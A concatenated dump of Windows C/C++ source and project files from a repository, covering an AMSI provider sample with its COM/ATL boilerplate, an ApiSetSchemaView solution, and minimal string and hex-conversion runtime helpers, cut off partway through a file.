/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rc -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | } 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {58d1c9d3-a7e5-4f1a-b441-007441745fe5} 18 | False 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | Source Files 27 | 28 | 29 | Source Files 30 | 31 | 32 | Generated Files 33 | 34 | 35 | Source Files 36 | 37 | 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files 44 | 45 | 46 | Header Files 47 | 48 | 49 | Header Files 50 | 51 | 52 | Generated Files 53 | 54 | 55 | Header Files 56 | 57 | 58 | 59 | 60 | Resource Files 61 | 62 | 63 | 64 | 65 | Resource Files 66 | 67 | 68 | Source Files 69 | 70 | 71 | Resource Files 72 | 73 | 74 | 75 | 76 | Source Files 77 | 78 | 79 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan_i.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the IIDs and CLSIDs */ 4 | 5 | /* link this file in with the server and any clients */ 6 | 7 | 8 | /* File created by MIDL compiler version 8.01.0622 */ 9 | /* at Mon Jan 18 19:14:07 2038 10 | */ 11 | /* Compiler settings for AmsiScan.idl: 12 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 13 | protocol : all , ms_ext, c_ext, robust 14 | error checks: allocation ref bounds_check enum stub_data 15 | VC __declspec() decoration level: 16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 17 | DECLSPEC_UUID(), MIDL_INTERFACE() 18 | */ 19 | /* @@MIDL_FILE_HEADING( ) */ 20 | 21 | 22 | 23 | #ifdef __cplusplus 24 | extern "C"{ 25 | #endif 26 | 27 | 28 | #include 29 | #include 30 | 31 | #ifdef _MIDL_USE_GUIDDEF_ 32 | 33 | #ifndef INITGUID 34 | #define INITGUID 35 | #include 36 | #undef INITGUID 37 | #else 38 | #include 39 | #endif 40 | 41 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 42 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) 43 | 44 | #else // !_MIDL_USE_GUIDDEF_ 45 | 46 | #ifndef __IID_DEFINED__ 47 | #define __IID_DEFINED__ 48 | 49 | typedef struct _IID 50 | { 51 | unsigned long x; 52 | unsigned short s1; 53 | unsigned short s2; 54 | unsigned char c[8]; 55 | } IID; 56 | 57 | #endif // __IID_DEFINED__ 58 | 59 | #ifndef CLSID_DEFINED 60 | #define CLSID_DEFINED 61 | typedef IID CLSID; 62 | #endif // CLSID_DEFINED 63 | 64 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 65 | EXTERN_C __declspec(selectany) const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}} 66 | 67 | #endif // !_MIDL_USE_GUIDDEF_ 68 | 69 | MIDL_DEFINE_GUID(IID, IID_IAmsiProvider,0x05025dfe,0x70d5,0x4b61,0xa5,0x5a,0xaa,0x21,0x58,0x5d,0x4c,0xb2); 70 | 71 | 72 | MIDL_DEFINE_GUID(IID, LIBID_AmsiScanLib,0x508c88ef,0xca97,0x4107,0xa0,0x22,0x60,0x25,0x89,0x2e,0xf1,0x92); 73 | 74 | 75 | MIDL_DEFINE_GUID(CLSID, CLSID_AmsiProvider,0x1c0643e1,0x5b0a,0x4420,0x9b,0x76,0x0d,0xe9,0x26,0x4b,0x4c,0x59); 76 | 77 | #undef MIDL_DEFINE_GUID 78 | 79 | #ifdef __cplusplus 80 | } 81 | #endif 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScanps.def: -------------------------------------------------------------------------------- 1 | 2 | LIBRARY 3 | 4 | EXPORTS 5 | DllGetClassObject PRIVATE 6 | DllCanUnloadNow PRIVATE 7 | DllRegisterServer PRIVATE 8 | DllUnregisterServer PRIVATE 9 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dlldata.c: -------------------------------------------------------------------------------- 1 | /********************************************************* 2 | DllData file -- generated by MIDL compiler 3 | 4 | DO NOT ALTER THIS FILE 5 | 6 | This file is regenerated by MIDL on every IDL file compile. 7 | 8 | To completely reconstruct this file, delete it and rerun MIDL 9 | on all the IDL files in this DLL, specifying this file for the 10 | /dlldata command line option 11 | 12 | *********************************************************/ 13 | 14 | #define PROXY_DELEGATION 15 | 16 | #include 17 | 18 | #ifdef __cplusplus 19 | extern "C" { 20 | #endif 21 | 22 | EXTERN_PROXY_FILE( AmsiScan ) 23 | 24 | 25 | PROXYFILE_LIST_START 26 | /* Start of list */ 27 | REFERENCE_PROXY_FILE( AmsiScan ), 28 | /* End of list */ 29 | PROXYFILE_LIST_END 30 | 31 | 32 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) 33 | 34 | #ifdef __cplusplus 35 | } /*extern "C" */ 36 | #endif 37 | 38 | /* end of generated dlldata file */ 39 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Implementation of DllMain. 2 | 3 | #include "stdafx.h" 4 | #include "resource.h" 5 | #include "AmsiScan_i.h" 6 | #include "dllmain.h" 7 | 8 | CAmsiScanModule _AtlModule; 9 | 10 | // DLL Entry Point 11 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) 12 | { 13 | hInstance; 14 | return _AtlModule.DllMain(dwReason, lpReserved); 15 | } 16 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.h: -------------------------------------------------------------------------------- 1 | // dllmain.h : Declaration of module class. 2 | 3 | class CAmsiScanModule : public ATL::CAtlDllModuleT< CAmsiScanModule > 4 | { 5 | public : 6 | DECLARE_LIBID(LIBID_AmsiScanLib) 7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_AMSISCAN, "{508c88ef-ca97-4107-a022-6025892ef192}") 8 | }; 9 | 10 | extern class CAmsiScanModule _AtlModule; 11 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by AmsiScan.rc 4 | // 5 | #define IDS_PROJNAME 100 6 | #define IDR_AMSISCAN 101 7 | #define IDR_AMSIPROVIDER 106 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 201 14 | #define _APS_NEXT_COMMAND_VALUE 32768 15 | #define _APS_NEXT_CONTROL_VALUE 201 16 | #define _APS_NEXT_SYMED_VALUE 107 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // AmsiScan.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, 3 | // but are changed infrequently 4 | 5 | #pragma once 6 | 7 | #ifndef STRICT 8 | #define STRICT 9 | #endif 10 | 11 | #include "targetver.h" 12 | 13 | #define _ATL_APARTMENT_THREADED 14 | 15 | #define _ATL_NO_AUTOMATIC_NAMESPACE 16 | 17 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 18 | 19 | 20 | #define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW 21 | 22 | #include "resource.h" 23 | #include 24 | #include 25 | #include 26 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {d4e6d057-7f5b-4186-9809-ee200840bfe8} 6 | False 7 | 8 | 9 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 10 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 11 | 12 | 13 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 14 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 15 | 16 | 17 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 18 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 19 | 20 | 21 | 22 | 23 | Source Files 24 | 25 | 26 | 27 | 28 | Generated Files 29 | 30 | 31 | Generated Files 32 | 33 | 34 | Generated Files 35 | 36 | 37 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderATL/AmsiServer/AmsiScanPS/AmsiScanPS.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiProviderServer", "AmsiProviderServer\AmsiProviderServer.vcxproj", "{1B740B58-E395-40B5-8345-1A7265DD727D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.ActiveCfg = Debug|x64 17 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x64.Build.0 = Debug|x64 18 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.ActiveCfg = Debug|Win32 19 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Debug|x86.Build.0 = Debug|Win32 20 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.ActiveCfg = Release|x64 21 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x64.Build.0 = Release|x64 22 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.ActiveCfg = Release|Win32 23 | {1B740B58-E395-40B5-8345-1A7265DD727D}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {8796A7D2-69DC-4BD8-B6E9-779ACC6AE4CF} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {5baab34b-228c-4014-a376-ce5e8f112526} 18 | 19 | 20 | 21 | 22 | Source Files 23 | 24 | 25 | minirtl 26 | 27 | 28 | Source Files 29 | 30 | 31 | minirtl 32 | 33 | 34 | minirtl 35 | 36 | 37 | minirtl 38 | 39 | 40 | minirtl 41 | 42 | 43 | minirtl 44 | 45 | 46 | 47 | 48 | Source Files 49 | 50 | 51 | 52 | 53 | Header Files 54 | 55 | 56 | Header Files 57 | 58 | 59 | Header Files 60 | 61 | 62 | Header Files 63 | 64 | 65 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/AmsiProviderServer.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/classfactory.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define _IOffset(Class, itf) ((UINT_PTR)&(((Class *)0)->itf)) 4 | #define IToClass(Class, itf, pitf) ((Class *)(((LPSTR)pitf)-_IOffset(Class, itf))) 5 | #define IToClassN(Class, itf, pitf) IToClass(Class, itf, pitf) 6 | 7 | typedef HRESULT(CALLBACK *LPFNCREATEINSTANCE)(IUnknown *pUnkOuter, REFIID riid, void **ppvObject); 8 | 9 | typedef struct _CClassFactory { 10 | const IClassFactoryVtbl *cf; 11 | const CLSID *pclsid; 12 | LPFNCREATEINSTANCE lpfnCreateInstance; 13 | } CClassFactory, *PCClassFactory; 14 | 15 | #define AMSI_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ 16 | EXTERN_C const GUID DECLSPEC_SELECTANY name \ 17 | = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } } 18 | 19 | AMSI_DEFINE_GUID(CLSID_AmsiProvider, 0x1c0643e1, 0x5b0a, 0x4420, 0x9b, 0x76, 0x0d, 0xe9, 0x26, 0x4b, 0x4c, 0x59); 20 | AMSI_DEFINE_GUID(IID_AntimalwareProvider, 0xb2cabfe3, 0xfe04, 0x42b1, 0xa5, 0xdf, 0x08, 0xd4, 0x83, 0xd4, 0xd1, 0x25); 21 | 22 | 23 | STDAPI_(LONG) DllAddRef(); 24 | STDAPI_(LONG) DllRelease(); 25 | 26 | extern const CClassFactory g_clsmap[]; 27 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/exports.def: -------------------------------------------------------------------------------- 1 | 2 | LIBRARY 3 | 4 | EXPORTS 5 | DllGetClassObject PRIVATE 6 | DllCanUnloadNow PRIVATE 7 | DllRegisterServer PRIVATE 8 | DllUnregisterServer PRIVATE 9 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/global.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #if defined (_MSC_VER) 4 | #if (_MSC_VER >= 1900) //VS15, 17 etc 5 | #ifdef _DEBUG 6 | #pragma comment(lib, "vcruntimed.lib") 7 | #pragma comment(lib, "ucrtd.lib") 8 | #else 9 | #pragma comment(lib, "libucrt.lib") 10 | #pragma comment(lib, "libvcruntime.lib") 11 | #endif 12 | #endif 13 | #endif 14 | 15 | #include 16 | #include 17 | #include "minirtl/minirtl.h" 18 | 19 | extern HMODULE g_currentModule; 20 | extern LONG g_cRefDll; 21 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strend.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strend_a(const char *s) 4 | { 5 | if ( s==0 ) 6 | return 0; 7 | 8 | while ( *s!=0 ) 9 | s++; 10 | 11 | return (char *)s; 12 | } 13 | 14 | wchar_t *_strend_w(const wchar_t *s) 15 | { 16 | if ( s==0 ) 17 | return 0; 18 | 19 | while ( *s!=0 ) 20 | s++; 21 | 22 | return (wchar_t *)s; 23 | } 24 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x >= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/u64tohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t u64tohex_a(unsigned long long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 16; 10 | 11 | for (c=0; c<16; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[15-c] = p; 21 | } 22 | 23 | s[16] = 0; 24 | return 16; 25 | } 26 | 27 | size_t u64tohex_w(unsigned long long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 16; 34 | 35 | for (c = 0; c<16; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[15-c] = p; 45 | } 46 | 47 | s[16] = 0; 48 | return 16; 49 | } 50 | -------------------------------------------------------------------------------- /source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/ultohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultohex_a(unsigned long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 8; 10 | 11 | for (c=0; c<8; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[7-c] = p; 21 | } 22 | 23 | s[8] = 0; 24 | return 8; 25 | } 26 | 27 | size_t ultohex_w(unsigned long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 8; 34 | 35 | for (c=0; c<8; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[7-c] = p; 45 | } 46 | 47 | s[8] = 0; 48 | return 8; 49 | } 50 | -------------------------------------------------------------------------------- /source/ApiSetSchema/1.manifest: -------------------------------------------------------------------------------- 1 | 2 | 3 | 9 | ApiSetSchemaView 10 | 11 | 12 | 13 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /source/ApiSetSchema/ApiSetSchemaView.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28010.2048 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ApiSetSchemaView", "ApiSetSchemaView.vcxproj", "{91352FD7-5569-4D5D-8677-735C8925A3B8}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.ActiveCfg = Debug|x64 15 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Debug|x64.Build.0 = Debug|x64 16 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.ActiveCfg = Release|x64 17 | {91352FD7-5569-4D5D-8677-735C8925A3B8}.Release|x64.Build.0 = Release|x64 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {82481A72-5B56-4EC1-98A9-64BB64B2BCDA} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /source/ApiSetSchema/ApiSetSchemaView.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | false 5 | 6 | -------------------------------------------------------------------------------- /source/ApiSetSchema/Resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/ApiSetSchema/Resource.rc -------------------------------------------------------------------------------- /source/ApiSetSchema/icon_gears.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/ApiSetSchema/icon_gears.ico -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( *dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strcmpi.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | int _strcmpi_a(const char *s1, const char *s2) 4 | { 5 | char c1, c2; 6 | 7 | if ( s1==s2 ) 8 | return 0; 9 | 10 | if ( s1==0 ) 11 | return -1; 12 | 13 | if ( s2==0 ) 14 | return 1; 15 | 16 | do { 17 | c1 = locase_a(*s1); 18 | c2 = locase_a(*s2); 19 | s1++; 20 | s2++; 21 | } while ( (c1 != 0) && (c1 == c2) ); 22 | 23 | return (int)(c1 - c2); 24 | } 25 | 26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2) 27 | { 28 | wchar_t c1, c2; 29 | 30 | if ( s1==s2 ) 31 | return 0; 32 | 33 | if ( s1==0 ) 34 | return -1; 35 | 36 | if ( s2==0 ) 37 | return 1; 38 | 39 | do { 40 | c1 = locase_w(*s1); 41 | c2 = locase_w(*s2); 42 | s1++; 43 | s2++; 44 | } while ( (c1 != 0) && (c1 == c2) ); 45 | 46 | return (int)(c1 - c2); 47 | } 48 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strend.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strend_a(const char *s) 4 | { 5 | if ( s==0 ) 6 | return 0; 7 | 8 | while ( *s!=0 ) 9 | s++; 10 | 11 | return (char *)s; 12 | } 13 | 14 | wchar_t *_strend_w(const wchar_t *s) 15 | { 16 | if ( s==0 ) 17 | return 0; 18 | 19 | while ( *s!=0 ) 20 | s++; 21 | 22 | return (wchar_t *)s; 23 | } 24 | -------------------------------------------------------------------------------- /source/ApiSetSchema/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = 